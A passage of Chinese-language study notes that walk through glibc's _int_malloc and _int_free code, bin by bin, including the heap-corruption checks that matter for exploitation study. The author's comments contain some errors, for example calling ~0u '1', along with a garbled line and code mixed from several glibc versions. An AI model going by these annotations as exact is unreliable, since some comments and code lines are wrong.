  unsigned long remainder_size;     /* its size */
  unsigned int block;               /* bit map traverser */
  unsigned int bit;                 /* bit map traverser */
  unsigned int map;                 /* current word of binmap */
  mchunkptr fwd;                    /* misc temp for linking */
  mchunkptr bck;                    /* misc temp for linking */
//if glibc2.26 and after
#if USE_TCACHE
  size_t tcache_unsorted_count;            /* count of unsorted chunks processed */
#endif
#define REMOVE_FB(fb, victim, pp)                        \
  do                                                        \
    {                                                        \
      victim = pp;                                        \
      if (victim == NULL)                                \
        break;                                                \
    }                                                        \
  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
         != victim);

简单的check

/*
     Convert request size to internal form by adding SIZE_SZ bytes
     overhead plus possibly more to obtain necessary alignment and/or
     to obtain a size of at least MINSIZE, the smallest allocatable
     size. Also, checked_request2size traps (returning 0) request sizes
     that are so large that they wrap around zero when padded and
     aligned.
   */
  checked_request2size (bytes, nb);
  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
     mmap.  */
  if (__glibc_unlikely (av == NULL))
    {
      void *p = sysmalloc (nb, av);
      if (p != NULL)
        alloc_perturb (p, bytes);
      return p;
    }

注意到checked_request2size()是一个宏定义, 可以改变参数nb的值

fastbin_range

/*
   If the size qualifies as a fastbin, first check corresponding bin.
   This code is safe to execute even if av is not yet initialized, so we
   can try it without checking, which saves some time on this fast path.
 */

2.25

if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
{
    idx = fastbin_index(nb);
    mfastbinptr *fb = &fastbin(av, idx);
    mchunkptr pp = *fb;
    do //取出第一个fastchunk
    {
        victim = pp;
        if (victim == NULL)
            break;
    } while ((pp = catomic_compare_and_exchange_val_acq(fb, victim->fd, victim)) != victim);
    if (victim != 0)
    {
        if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
        {	//请求的bytes->nb->idx->fb, 所以idx是按照bytes来确定的, 从这组idx里取出一个fastbinchunk,
            //将他的大小转换为下标, 如果这两个不相等说明fastbin的size段被篡改
            //chunksize(victim) != nb想来也一样吧(?
            errstr = "malloc(): memory corruption (fast)";
        errout:
            malloc_printerr(check_action, errstr, chunk2mem(victim), av);
            return NULL;
        }
        //检查arena,大小,alignment,chunk_size等等
        check_remalloced_chunk(av, victim, nb);
        //返回用户指针
        void *p = chunk2mem(victim);
        //如果设置了perturb_type, 则将获取到的chunk初始化为 perturb_type ^ 0xff
        alloc_perturb(p, bytes);
        return p;
    }
}

2.26

    if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp;
      victim = *fb;
      if (victim != NULL)
        {
          if (SINGLE_THREAD_P)
            *fb = victim->fd;
          else
            REMOVE_FB (fb, pp, victim);
          if (__glibc_likely (victim != NULL))
            {
              size_t victim_idx = fastbin_index (chunksize (victim));
              if (__builtin_expect (victim_idx != idx, 0))
                malloc_printerr ("malloc(): memory corruption (fast)");
              check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE
              /* While we're here, if we see other chunks of the same size,
                 stash them in the tcache.  */
              size_t tc_idx = csize2tidx (nb);
              if (tcache && tc_idx < mp_.tcache_bins)
                {
                  mchunkptr tc_victim;
                  /* While bin not empty and tcache not full, copy chunks.  */
                  while (tcache->counts[tc_idx] < mp_.tcache_count
                         && (tc_victim = *fb) != NULL)
                    {
                      if (SINGLE_THREAD_P)
                        *fb = tc_victim->fd;
                      else
                        {
                          REMOVE_FB (fb, pp, tc_victim);
                          if (__glibc_unlikely (tc_victim == NULL))
                            break;
                        }
                      tcache_put (tc_victim, tc_idx);
                    }
                }
#endif
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;
            }
        }
    }

smallbin_range 2.27

  /*
     If a small request, check regular bin.  Since these "smallbins"
     hold one size each, no searching within bins is necessary.
     (For a large request, we need to wait until unsorted chunks are
     processed to find best fit. But for small ones, fits are exact
     anyway, so we can check now, which is faster.)
   */
	if (in_smallbin_range(nb))
    {
        idx = smallbin_index(nb);
        bin = bin_at(av, idx);

        if ((victim = last(bin)) != bin) //FIFO
        {
            bck = victim->bk; //取出倒数第二个chunk
            if (__glibc_unlikely(bck->fd != victim))
                malloc_printerr("malloc(): smallbin double linked list corrupted");
            set_inuse_bit_at_offset(victim, nb);
            bin->bk = bck;
            bck->fd = bin;

            if (av != &main_arena)
                set_non_main_arena(victim);
            check_malloced_chunk(av, victim, nb);
#if USE_TCACHE
            /* While we're here, if we see other chunks of the same size,
            stash them in the tcache.  */
            size_t tc_idx = csize2tidx(nb);
            if (tcache && tc_idx < mp_.tcache_bins)
            {
                mchunkptr tc_victim;

                /* While bin not empty and tcache not full, copy chunks over.  */
                while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin)
                {
                    if (tc_victim != 0)
                    {
                        bck = tc_victim->bk;
                        set_inuse_bit_at_offset(tc_victim, nb);
                        if (av != &main_arena)
                            set_non_main_arena(tc_victim);
                        bin->bk = bck;
                        bck->fd = bin;

                        tcache_put(tc_victim, tc_idx);
                    }
                }
            }
#endif
            void *p = chunk2mem(victim);
            alloc_perturb(p, bytes);
            return p;
        }
    }

largebin_range

/*     If this is a large request, consolidate fastbins before continuing.     
    While it might look excessive to kill all fastbins before     
    even seeing if there is space available, this avoids     
    fragmentation problems normally associated with fastbins.     
    Also, in practice, programs tend to have runs of either small or     
    large requests, but less often mixtures, so consolidation is not     
    invoked all that often in most programs. And the programs that     
    it is called frequently in otherwise tend to fragment.   */
else
{
    idx = largebin_index(nb);
    if (have_fastchunks(av))
        malloc_consolidate(av);
}

简而言之就是先执行malloc_consolidate(), 合并fastbin中的free chunks

unsorted bin 大循环

/*     Process recently freed or remaindered chunks, taking one only if     
    it is exact fit, or, if this a small request, the chunk is remainder from     
    the most recent non-exact fit.  Place other traversed chunks in     
    bins.  Note that this step is the only place in any routine where     
    chunks are placed in bins.     
    The outer loop here is needed because we might not realize until     
    near the end of malloc that we should have consolidated, so must     
    do so and retry. This happens at most once, and only when we would     
    otherwise need to expand memory to service a "small" request.   */
#if USE_TCACHE
INTERNAL_SIZE_T tcache_nb = 0;
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
    tcache_nb = nb;
int return_cached = 0;
tcache_unsorted_count = 0;
#endif
for (;;)
{
    int iters = 0;
    while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) // 取出链表最后一个, FIFO
    {
        bck = victim->bk; //倒数第二个
        //victim过大或过小都会出错
        if (__builtin_expect(chunksize_nomask(victim) <= 2 * SIZE_SZ, 0) || 							                     __builtin_expect(chunksize_nomask(victim) > av->system_mem, 0))
            malloc_printerr(check_action, "malloc(): memory corruption", chunk2mem(victim), av);
        size = chunksize(victim);

if small try last remainder

      /*
           If a small request, try to use last remainder if it is the
           only chunk in unsorted bin.  This helps promote locality for
           runs of consecutive small requests. This is the only
           exception to best-fit, and applies only when there is
           no exact fit for a small chunk.
         */
// 如果当前请求位于small chunks的大小范围内
    	// 同时，unsorted bin里只有一个chunk，该chunk还是last_remainder
    	// 并且 last remainder 的大小分割后还可以作为一个 chunk
      if (in_smallbin_range(nb) && 
          bck == unsorted_chunks(av) && 
          victim == av->last_remainder && 
          (unsigned long)(size) > (unsigned long)(nb + MINSIZE)) //victim分割出nb后还有MINSIZE
      {
          /* split and reattach remainder */
          remainder_size = size - nb;
          //分割后剩下的chunk指针
          remainder = chunk_at_offset(victim, nb);
          //设置从unsorted bin中割出来的chunk的fd和bk
          unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
          //更新last_remainer
          av->last_remainder = remainder;
          //设置剩下的chunk的fd和bk
          remainder->bk = remainder->fd = unsorted_chunks(av);
          if (!in_smallbin_range(remainder_size))
          {//如果是largechunk, 也设置一下nextsize
              remainder->fd_nextsize = NULL;
              remainder->bk_nextsize = NULL;
          }
          //设置两个块的标记bit
          set_head(victim, nb | PREV_INUSE |
                               (av != &main_arena ? NON_MAIN_ARENA : 0));
          set_head(remainder, remainder_size | PREV_INUSE);
          set_foot(remainder, remainder_size);
          //详细的检查, 只有在MALLOC_DEBUG为1时启用
          check_malloced_chunk(av, victim, nb);
          //返回用户指针
          void *p = chunk2mem(victim);
          alloc_perturb(p, bytes);
          return p;
      }

else 取出victim, 准备放入合适的bin中

//如果不满足上面的条件, 就往下执行        
/* remove from unsorted list */ 
//取出了victim        
if (__glibc_unlikely (bck->fd != victim)) //2.28特供
          malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks(av)->bk = bck;        
bck->fd = unsorted_chunks(av);

if exact fit, tcache or return

        /* Take now instead of binning if exact fit */ //如果有刚好的chunk, 取出并返回.
        if (size == nb)
        {
            set_inuse_bit_at_offset(victim, size);
            if (av != &main_arena)
                set_non_main_arena(victim);
#if USE_TCACHE //用tcache就放到里面不返回. 在循环结束之后取出返回. 设置了return_cached为1. 
            /* Fill cache first, return to user only if cache fills.		 
            We may return one of these chunks later.  */ 
            if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count)
            {
                tcache_put(victim, tc_idx);
                return_cached = 1;
                continue;
            }
            else
            {
#endif 		    //详细的检查, 只有在MALLOC_DEBUG为1时启用	
                check_malloced_chunk(av, victim, nb);
                void *p = chunk2mem(victim);
                alloc_perturb(p, bytes);
                return p;
#if USE_TCACHE
            }
#endif
        }

放入small or large bin

       /* place chunk in bin */
	//这一步意味着没有刚好合适的chunk, 所以放入到相应的bin中
       if (in_smallbin_range(size))
       {//如果是smallbin
           victim_index = smallbin_index(size);
           bck = bin_at(av, victim_index);//bin数组里的chunk指针
           fwd = bck->fd;//smallbin链表里的第一个chunk
       }
       else
       {//如果不是small的话就是largebin了
           victim_index = largebin_index(size);
           bck = bin_at(av, victim_index);
           fwd = bck->fd;

           /* maintain large bins in sorted order */
           //largebin是有顺序的(从左往右,由大至小), 要放在合适的位置, 还要设置fd_nextsize等等
           if (fwd != bck)
           {//如果largebin为非空
               /* Or with inuse bit to speed comparisons */
               size |= PREV_INUSE;
               /* if smaller than smallest, bypass loop below */
               //如果不是在main_arena呢?看来还是得学一学线程
               assert(chunk_main_arena(bck->bk));
               //chunksize_nomask()直接取出size段, 不用位运算, 所以说speed comparison
               if ((unsigned long)(size) < (unsigned long)chunksize_nomask(bck->bk))
               {//victim的size小于largebin尾部(bck->bk)的最小chunk, 放到最右边
                  	// 令 fwd 指向 large bin 头
                   fwd = bck;
                   // 令 bck 指向 largin bin 尾部 chunk
                   bck = bck->bk;
                   // victim 的 fd_nextsize 指向 largin bin 的第一个 chunk
                   victim->fd_nextsize = fwd->fd;
                   // victim 的 bk_nextsize 指向原来链表的第一个 chunk 指向的 bk_nextsize
                   //原来链表的第一个 chunk 指向的 bk_nextsize是原来最小的(chunk A),
                   //因为这时victim比A小, 所以victim的bk_nextsize肯定是A
                   victim->bk_nextsize = fwd->fd->bk_nextsize;
                   // 原来链表的第一个 chunk 的 bk_nextsize 指向 victim
                   // 原来指向链表第一个 chunk 的 fd_nextsize 指向 victim
                   fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim
               }
               else
               {
                       // 当前要插入的 victim 的大小大于最小的 chunk, 从左往右查找合适位置.
                       // 判断 fwd 是否在 main arena
                       assert(chunk_main_arena(fwd));
// 从链表头部开始找到不比 victim 大的 chunk
                       while ((unsigned long) size < chunksize_nomask(fwd)) {
                           fwd = fwd->fd_nextsize;
                           assert(chunk_main_arena(fwd));
                       }
                       // 如果找到了一个和 victim 一样大的 chunk，
                       // 那就直接将 chunk 插入到该chunk的后面，并不修改 nextsize 指针。
                       if ((unsigned long) size ==
                           (unsigned long) chunksize_nomask(fwd))
                           /* Always insert in the second position.  */
                           fwd = fwd->fd;
                       else {
                           // 如果找到的chunk和当前victim大小不一样
					 // 就需要构造 nextsize 双向链表,victim插入到fwd和左边一个chunk之间
                           victim->fd_nextsize              = fwd;
                           victim->bk_nextsize              = fwd->bk_nextsize;
                           fwd->bk_nextsize                 = victim;
                           victim->bk_nextsize->fd_nextsize = victim;
                       }
                       bck = fwd->bk;
               }
           }
           else //如果largebin是空的,fd_next和bk_next都指向自己就可以了
               victim->fd_nextsize = victim->bk_nextsize = victim;
       }
   //完成victim的fd和bk指针的修改, 形成bck-->victim-->fwd
       mark_bin(av, victim_index);
       victim->bk = bck;
       victim->fd = fwd;	//以上两行将victim插入到相应的链表头部中
       fwd->bk = victim;
       bck->fd = victim;	//修改bck的fd指向victim, fwd(即现在的第二个chunk)的bk指向victim

判断iters(大循环结尾)

#if USE_TCACHE
        /* If we've processed as many chunks as we're allowed while
	 filling the cache, return one of the cached ones.  */
        ++tcache_unsorted_count;
        if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit)
        {
            return tcache_get(tc_idx);
        }
#endif

#define MAX_ITERS 10000
        if (++iters >= MAX_ITERS)
            break;
    }//unsorted大循环结束, 避免花费过多时间在unsortedbin的处理上

#if USE_TCACHE
    /* If all the small chunks we found ended up cached, return one now.  */
    if (return_cached)
    {
        return tcache_get(tc_idx);
    }
#endif

large request

值得注意的是使用反向遍历.

   /*
        If a large request, scan through the chunks of current bin in
        sorted order to find smallest that fits.  Use the skip list for this.
      */
//回想一下, 循环之前判断了fastbin和smallbin, 到largebin的时候先malloc_consolidate清理fastbin到unsortedbin,
//从unsortedbin中一个个取出,历经last_remainer,exact fit和放入相应bin中后, 循环中只判断了从unsortedbin中取出的块
//即合并之后的chunk,并且没有一块和nb相等.由于smallbin每个bin中chunk大小一致,也就是说两次比较smallbin中都没有合适的chunk,
//跳出循环之后直接找 *largechunk* 里的即可, 并且是find smallest that fits, 不一定要刚刚好
   if (!in_smallbin_range(nb))
   {
       bin = bin_at(av, idx); //idx是nb定位出来的idx,在大循环之前,到这里说明是largebin_idx

       /* skip scan if empty or largest chunk is too small */
       if ((victim = first(bin)) != bin && (unsigned long)chunksize_nomask(victim) >= (unsigned long)(nb))
       {//如果该largebin非空 且 最大的不小于nb
           //为了反向遍历,victim指向最后一个最小的largechunk
           victim = victim->bk_nextsize;
           //找出第一个不小于nb的块, 并且赋值size为这个chunk的大小
           //如果有多个相同大小的chunk, victim会定位到第一个有fd_nextsize指针的chunk
           while (((unsigned long)(size = chunksize(victim)) <(unsigned long)(nb)))
               victim = victim->bk_nextsize;

           //如果从largebin链表中选取的victim不是链表中的最后一个chunk,并且与victim大小相同的chunk不止一个
           //意味着victim为chunk size链表中的节点
           //为了避免调整chunksize链表, 将victim的fd作为候选chunk
           if (victim != last(bin) && chunksize_nomask(victim) == chunksize_nomask(victim->fd))
               victim = victim->fd;
           
	   //准备分割,unlink取出victim
           remainder_size = size - nb;
           unlink(av, victim, bck, fwd);

           /* Exhaust */
           if (remainder_size < MINSIZE)
           {//如果剩下的小于MINSIZE就把整个victim给出去
               //例行设置inuse_bit和non_main_arena_bit
               set_inuse_bit_at_offset(victim, size);
               if (av != &main_arena)
                   set_non_main_arena(victim);
           }
           /* Split */
           else//如果过大就要分割, 取前面一部分, 多出来的放到unsorted bin
           {
               remainder = chunk_at_offset(victim, nb);//取出剩下的chunk指针, 前面写过相关过程
               /* We cannot assume the unsorted list is empty and therefore
                    have to perform a complete insert here.  */
               //插入unsortedbin头部
               bck = unsorted_chunks(av);
               fwd = bck->fd;
               if (__glibc_unlikely(fwd->bk != bck))
               {//简单的检查,防止fwd被篡改
                   errstr = "malloc(): corrupted unsorted chunks";
                   goto errout;
               }
               remainder->bk = bck;
               remainder->fd = fwd;
               bck->fd = remainder;
               fwd->bk = remainder;//插入完成
               if (!in_smallbin_range(remainder_size))
               {//largebin就设置一下
                   remainder->fd_nextsize = NULL;
                   remainder->bk_nextsize = NULL;
               }
               set_head(victim, nb | PREV_INUSE |
                                    (av != &main_arena ? NON_MAIN_ARENA : 0));
               set_head(remainder, remainder_size | PREV_INUSE);
               set_foot(remainder, remainder_size);
           }
           //详细的检查, 只有在MALLOC_DEBUG为1时启用
           check_malloced_chunk(av, victim, nb);
           void *p = chunk2mem(victim);
           alloc_perturb(p, bytes);
           return p;
       }
   }

Search for next largest bin

   /*
        Search for a chunk by scanning bins, starting with next largest
        bin. This search is strictly by best-fit; i.e., the smallest
        (with ties going to approximately the least recently used) chunk
        that fits is selected.

        The bitmap avoids needing to check that most blocks are nonempty.
        The particular case of skipping all bins during warm-up phases
        when no chunks have been returned yet is faster than it might look.
      */
//fastbin,smallbin中刚好的-->fastbin合并后+unsortedbin中刚好的-->用nb定位的largebin_idx中不小于的
//以上这些全部失败之后进行下面的操作,寻找比当前idx更大的idx
   ++idx;//直接+1
   bin = bin_at(av, idx);
//使用bitmap能够避免循环判断+1后的idx指向的链表是不是空的
//除了mark_bin unmark_bin get_binmap其他binmap函数都不涉及 binmap数组, 只是单纯的移位运算
   block = idx2block(idx);	//算出block
   map = av->binmap[block];//取出map
   bit = idx2bit(idx);		//算出该位的bit

   for (;;)
   {//大循环,找到后 or 没有-->(goto use_top)
       /* Skip rest of block if there are no more set bits in this block.  */
       //Skip rest of block if there are no more set bits in this block.
       if (bit > map || bit == 0)
       {//当前bit为0 或者 chunk后面的bit也等于0(bit > map), idx2bit()不可能得到0,应该是循环下面的部分
           do
           {
               if (++block >= BINMAPSIZE) /* out of bins */
                   goto use_top;	//没有的话只能够使用top chunk了
           } while ((map = av->binmap[block]) == 0);	//不等零

           bin = bin_at(av, (block << BINMAPSHIFT));	//取到了更大且非空的bin
           bit = 1;
       }

       /* Advance to bin with set bit. There must be one. */
       //1.没有经过上面的if,原map中就大于等于bit, 从原bit位开始左移
       //2.经过了上面的if,bit从最低位开始左移
       //从bit位开始找bin header, 肯定是存在的
       while ((bit & map) == 0)
       {
           bin = next_bin(bin);
           bit <<= 1;
           assert(bit != 0);
       }

       /* Inspect the bin. It is likely to be non-empty */
       //既然比nb都大, 就选一个最右边的, 这样在largebin中还是最小的
       victim = last(bin);

       /*  If a false alarm (empty bin), clear the bit. */
       // 如果victim=bin，那么我们就将map对应的位清0，然后获取下一个bin
       // 这种情况发生的概率应该很小。
       if (victim == bin)
       {
           av->binmap[block] = map &= ~bit; /* Write through */
           bin = next_bin(bin);
           bit <<= 1;
       }
       else
       {
           size = chunksize(victim);

           /*  We know the first chunk in this bin is big enough to use. */
           assert((unsigned long)(size) >= (unsigned long)(nb));
           
           remainder_size = size - nb;

           /* unlink */
           unlink(av, victim, bck, fwd);

           /* Exhaust */
           if (remainder_size < MINSIZE)
           {//不够就整块送出去
               set_inuse_bit_at_offset(victim, size);
               if (av != &main_arena)
                   set_non_main_arena(victim);
           }
           /* Split */
           else
           {//够了就分割
               remainder = chunk_at_offset(victim, nb);

               /* We cannot assume the unsorted list is empty and therefore
                    have to perform a complete insert here.  */
               bck = unsorted_chunks(av);
               fwd = bck->fd;
               if (__glibc_unlikely(fwd->bk != bck))
               {
                   errstr = "malloc(): corrupted unsorted chunks 2";
                   goto errout;
               }
               remainder->bk = bck;
               remainder->fd = fwd;
               bck->fd = remainder;
               fwd->bk = remainder;

               /* advertise as last remainder */
               // 如果在small bin范围内，就将其标记为remainder
               if (in_smallbin_range(nb))
                   av->last_remainder = remainder;
               if (!in_smallbin_range(remainder_size))
               {
                   remainder->fd_nextsize = NULL;
                   remainder->bk_nextsize = NULL;
               }
               set_head(victim, nb | PREV_INUSE |
                                    (av != &main_arena ? NON_MAIN_ARENA : 0));
               set_head(remainder, remainder_size | PREV_INUSE);
               set_foot(remainder, remainder_size);
           }
           //详细的检查, 只有在MALLOC_DEBUG为1时启用
           check_malloced_chunk(av, victim, nb);
           void *p = chunk2mem(victim);
           alloc_perturb(p, bytes);
           return p;
       }
   }

use_top

万策尽了, 使用top chunk.

use_top:
    /*   没看懂写了啥(replenished,fenceposts)
         If large enough, split off the chunk bordering the end of memory
         (held in av->top). Note that this is in accord with the best-fit
         search rule.  In effect, av->top is treated as larger (and thus
         less well fitting) than any other available chunk since it can
         be extended to be as large as necessary (up to system
         limitations).

         We require that av->top always exists (i.e., has size >=
         MINSIZE) after initialization, so if it would otherwise be
         exhausted by current request, it is replenished. (The main
         reason for ensuring it exists is that we may need MINSIZE space
         to put in fenceposts in sysmalloc.)
       */

    victim = av->top;
    size = chunksize(victim);

    if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE))
    {//如果top足够大, 就分割
        remainder_size = size - nb;
        remainder = chunk_at_offset(victim, nb);
        av->top = remainder;
        set_head(victim, nb | PREV_INUSE |
                             (av != &main_arena ? NON_MAIN_ARENA : 0));
        set_head(remainder, remainder_size | PREV_INUSE);
		//详细的检查, 只有在MALLOC_DEBUG为1时启用
        check_malloced_chunk(av, victim, nb);
        void *p = chunk2mem(victim);
        alloc_perturb(p, bytes);
        return p;
    }
    /* When we are using atomic ops to free fast chunks we can get
         here for all block sizes.  */
    else if (have_fastchunks(av))
    {//如果不够大且当前arena有fastchunk, 再次malloc_consolidate()等待下一次循环是否可行
        malloc_consolidate(av);
        /* restore original bin index */
        if (in_smallbin_range(nb))
            idx = smallbin_index(nb);
        else
            idx = largebin_index(nb);
    }
    /*
         Otherwise, relay to handle system-dependent cases
       */
    else
    {//啥都没有, 直接sysmalloc()增加topchunk,并且return跳出循环
        void *p = sysmalloc(nb, av);
        if (p != NULL)
            alloc_perturb(p, bytes);
        return p;
    }
}

补充: 更大的内存分配–sysmalloc

/*
   sysmalloc handles malloc cases requiring more memory from the system.
   On entry, it is assumed that av->top does not have enough
   space to service request for nb bytes, thus requiring that av->top
   be **extended** or **replaced**.
 */

第一种情况: 使用mmap

/*
   If have mmap, and the request size meets the mmap threshold, and
   the system supports mmap, and there are few enough currently
   allocated mmapped regions, try to directly map this request
   rather than expanding top.
 */

主要是根据mp_里的mmap控制变量来决定是否使用mmap.

因为mmap的chunk没有下一个chunk的prevsize可以使用, 所以overhead还要加上一个size_t, 然后最终大小再和pageSize对齐.

然后进行一些检查和mp_参数的更新, 返回可用的chunk.

第二种: 替换或拓展top

这种方法用到了其他线程的arena和morecore之类的macro, 看不懂先跳过了.

释放内存块

__libc_free

void __libc_free(void *mem) {
    mstate    ar_ptr;
    mchunkptr p; /* chunk corresponding to mem */
    // 判断是否有钩子函数 __free_hook
    void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
    if (__builtin_expect(hook != NULL, 0)) {
        (*hook)(mem, RETURN_ADDRESS(0));
        return;
    }
    // free NULL没有作用
    if (mem == 0) /* free(0) has no effect */
        return;
    // 将mem转换为chunk状态
    p = mem2chunk(mem);
    // 如果该块内存是mmap得到的
    if (chunk_is_mmapped(p)) /* release mmapped memory. */
    {
        /* See if the dynamic brk/mmap threshold needs adjusting.
       Dumped fake mmapped chunks do not affect the threshold.  */
        if (!mp_.no_dyn_threshold && chunksize_nomask(p) > mp_.mmap_threshold &&
            chunksize_nomask(p) <= DEFAULT_MMAP_THRESHOLD_MAX &&
            !DUMPED_MAIN_ARENA_CHUNK(p)) {
            mp_.mmap_threshold = chunksize(p);
            mp_.trim_threshold = 2 * mp_.mmap_threshold;
            LIBC_PROBE(memory_mallopt_free_dyn_thresholds, 2,
                       mp_.mmap_threshold, mp_.trim_threshold);
        }
        munmap_chunk(p);
        return;
    }
    MAYBE_INIT_TCACHE (); //唯一的tcache
    
    // 根据chunk获得分配区的指针
    ar_ptr = arena_for_chunk(p);
    // 执行释放
    _int_free(ar_ptr, p, 0);
}

_int_free

变量定义

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */
  mchunkptr nextchunk;         /* next contiguous chunk */
  INTERNAL_SIZE_T nextsize;    /* its size */
  int nextinuse;               /* true if nextchunk is used */
  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
  mchunkptr bck;               /* misc temp for linking */
  mchunkptr fwd;               /* misc temp for linking */

  const char *errstr = NULL;
  int locked = 0;

  size = chunksize (p);

小检查 & tcache

    /* Little security check which won't hurt performance: the
       allocator never wrapps around at the end of the address space.
       Therefore we can exclude some size values which might appear
       here by accident or by "design" from some intruder.  */
    // 指针不能指向非法的地址, 必须小于等于-size，为什么？？？
    // 指针必须得对齐，2*SIZE_SZ 这个对齐
    if (__builtin_expect((uintptr_t) p > (uintptr_t) -size, 0) ||
        __builtin_expect(misaligned_chunk(p), 0)) {
        errstr = "free(): invalid pointer";
    errout:
        if (!have_lock && locked) __libc_lock_unlock(av->mutex);
        malloc_printerr(check_action, errstr, chunk2mem(p), av);
        return;
    }
    /* We know that each chunk is at least MINSIZE bytes in size or a
       multiple of MALLOC_ALIGNMENT.  */
    // 大小没有最小的chunk大，或者说，大小不是MALLOC_ALIGNMENT的整数倍
    if (__glibc_unlikely(size < MINSIZE || !aligned_OK(size))) {
        errstr = "free(): invalid size";
        goto errout;
    }
    // 检查该chunk是否处于使用状态，非调试状态下没有作用
    check_inuse_chunk(av, p);

#if USE_TCACHE
  {
    size_t tc_idx = csize2tidx (size);

    if (tcache
	&& tc_idx < mp_.tcache_bins
	&& tcache->counts[tc_idx] < mp_.tcache_count)
      {
	tcache_put (p, tc_idx);
	return;
      }
  }
#endif

其中

/* Check if m has acceptable alignment */

#define aligned_OK(m) (((unsigned long) (m) &MALLOC_ALIGN_MASK) == 0)

#define misaligned_chunk(p)                                                    \
    ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem(p)) &       \
     MALLOC_ALIGN_MASK)

on fastbin

    /*
        If eligible, place chunk on a fastbin so it can be found
        and used quickly in malloc.
    */

    if ((unsigned long)(size) <= (unsigned long)(get_max_fast())

#if TRIM_FASTBINS
        /*
        If TRIM_FASTBINS set, don't place chunks
        bordering top into fastbins 
        */
        && (chunk_at_offset(p, size) != av->top) //这个宏是在if语句里加上一条,意义是p不和top chunk相邻
#endif
    	)
    {

        if (__builtin_expect(chunksize_nomask(chunk_at_offset(p, size)) <= 2 * SIZE_SZ, 0) || 	
            __builtin_expect(chunksize(chunk_at_offset(p, size)) >= av->system_mem, 0))
        {
            /* We might not have a lock at this point and concurrent modifications
        of system_mem might have let to a false positive.  Redo the test
        after getting the lock.  */
            if (have_lock || (
                                {
                                    assert(locked == 0);
                                    __libc_lock_lock(av->mutex);
                                    locked = 1;
                                    chunksize_nomask(chunk_at_offset(p, size)) <= 2 * SIZE_SZ || 
                                    chunksize(chunk_at_offset(p, size)) >= av->system_mem;
                                }))
            {
                errstr = "free(): invalid next size (fast)";
                goto errout;
            }
            if (!have_lock)
            {
                __libc_lock_unlock(av->mutex);
                locked = 0;
            }
        }
        // 将chunk的mem部分全部设置为perturb_byte
        free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);
        // 设置fast chunk的标记位
        set_fastchunks(av);
        unsigned int idx = fastbin_index(size);
        fb = &fastbin(av, idx); //取出fastbin头指针

        /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
        //多线程相关, 跳过
        mchunkptr old = *fb, old2;
        unsigned int old_idx = ~0u; //不就是 1 吗?
        do
        {
            /* Check that the top of the bin is not the record we are going to add
        (i.e., double free).  */
            if (__builtin_expect(old == p, 0))
            { //防止对 fast bin double free
                errstr = "double free or corruption (fasttop)";
                goto errout;
            }
            /* Check that size of fastbin chunk at the top is the same as
        size of the chunk that we are adding.  We can dereference OLD
        only if we have the lock, otherwise it might have already been
        deallocated.  See use of OLD_IDX below for the actual check.  */
            if (have_lock && old != NULL)
                old_idx = fastbin_index(chunksize(old));
            p->fd = old2 = old;
        } while ((old = catomic_compare_and_exchange_val_rel(fb, p, old2)) != old2);

        if (have_lock && old != NULL && __builtin_expect(old_idx != idx, 0))
        {
            errstr = "invalid fastbin entry (free)";
            goto errout;
        }
    }

合并非 mmap 的空闲 chunk

只有不是 fast bin 的情况下才会触发 unlink

首先我们先说一下为什么会合并 chunk，这是为了避免 heap 中有太多零零碎碎的内存块，合并之后可以用来应对更大的内存块请求。合并的主要顺序为

先考虑物理低地址空闲块
后考虑物理高地址空闲块

合并后的 chunk 指向合并的 chunk 的低地址。

在没有锁的情况下，先获得锁。

/*
  Consolidate other non-mmapped chunks as they arrive.
*/

else if (!chunk_is_mmapped(p)) {
    if (!have_lock) {
        __libc_lock_lock(av->mutex);
        locked = 1;
    }
    nextchunk = chunk_at_offset(p, size);

轻量级的检测

/* Lightweight tests: check whether the block is already the
   top block.  */
// 当前free的chunk不能是top chunk
if (__glibc_unlikely(p == av->top)) {
    errstr = "double free or corruption (top)";
    goto errout;
}
// 当前free的chunk的下一个chunk不能超过arena的边界
/* Or whether the next chunk is beyond the boundaries of the arena.  */
if (__builtin_expect(contiguous(av) &&
                         (char *) nextchunk >=
                             ((char *) av->top + chunksize(av->top)),
                     0)) {
    errstr = "double free or corruption (out)";
    goto errout;
}
// 当前要free的chunk的使用标记没有被标记，double free
/* Or whether the block is actually not marked used.  */
if (__glibc_unlikely(!prev_inuse(nextchunk))) {
    errstr = "double free or corruption (!prev)";
    goto errout;
}
// 下一个chunk的大小
nextsize = chunksize(nextchunk);
// next chunk size valid check
// 判断下一个chunk的大小是否不大于2*SIZE_SZ，或者
// nextsize是否大于系统可提供的内存
if (__builtin_expect(chunksize_nomask(nextchunk) <= 2 * SIZE_SZ, 0) ||
    __builtin_expect(nextsize >= av->system_mem, 0)) {
    errstr = "free(): invalid next size (normal)";
    goto errout;
}

释放填充

1 2	`//将指针的mem部分全部设置为perturb_byte free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);`

后向合并 - 合并低地址 chunk

    /* consolidate backward */        
if (!prev_inuse(p)) {            
    prevsize = prev_size(p);            
    size += prevsize;            
    p = chunk_at_offset(p, -((long) prevsize));            
    unlink(av, p, bck, fwd);        
}

